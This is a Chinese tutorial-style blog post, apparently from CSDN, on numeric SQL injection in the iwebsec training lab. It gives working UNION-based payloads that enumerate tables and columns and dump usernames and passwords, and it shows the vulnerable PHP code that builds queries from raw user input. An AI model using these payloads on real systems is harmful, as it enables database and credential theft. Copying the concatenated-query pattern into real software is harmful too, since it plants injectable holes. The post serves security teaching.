SQL注入漏洞 | 数字型

文章目录

前言


SQL注入漏洞 | iwebsec

MySQL 数字型


  1. 页面观察:测试看回显
    在这里插入图片描述

  2. 注入点判断:发现有sql注入漏洞

    AND 可在 where 子语句中把两个或多个条件结合起来。如果第一个条件和第二个条件都成立,则 AND 运算符显示一条记录。

    在这里插入图片描述

    在这里插入图片描述

  3. 判断当前表的字段数

    order by 语句用于根据指定的列对结果集进行排序。

  4. 判断显示位,需要让id的值为不可能的值,因为只能回显一次结果,id的结果不存在才会回显union语句的结果。

    union 操作符用于合并两个或多个 select 语句的结果集。union 内部的 select 语句必须拥有相同的列数。

    在这里插入图片描述

  5. 爆库名
    在这里插入图片描述

  6. 爆表名

    /sqli/01.php?id=-1 union select database(),2,group_concat(table_name) from information_schema.tables where table_schema=database()
    

    在这里插入图片描述

  7. 爆字段名

    /sqli/01.php?id=-1 union select database(),2,group_concat(column_name) from information_schema.columns where table_name=user
    

    在这里插入图片描述

  8. 爆相应字段的所有数据

    /sqli/01.php?id=-1 union select group_concat(id,'--'),2,group_concat(id,'--',username,'--',password,'--') from user
    

    在这里插入图片描述

  9. 看源码

    docker exec -it iwebsec bash
    cat /var/www/html/sqli/01.php
    
    	......
    <?php
    	if(isset($_GET['id']))
    	{
    		$id=$_GET['id'];  //用户输入的参数
    		$sql="SELECT * FROM user WHERE id=$id LIMIT 0,1";  //将用户输入的参数直接拼接在sql语句
    		$result=mysql_query($sql);  //传入后台数据库进行查询,result为返回的查询结果
    	}
    	else
    	{
    		exit();
    	}
    ?>
    	......
    

    分析

    $id=0 union select 1,2,3
    $sql="SELECT * FROM user WHERE id=0 union select 1,2,3 LIMIT 0,1";
    

    $sql的意思是将SELECT * FROM user WHERE id=0select 1,2,3的结果并在一起返回。但是由于LIMIT 0,1限制,只能返回一条,因此可以让前面的语句没有结果,那么就可以返回后面语句的结果了。

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值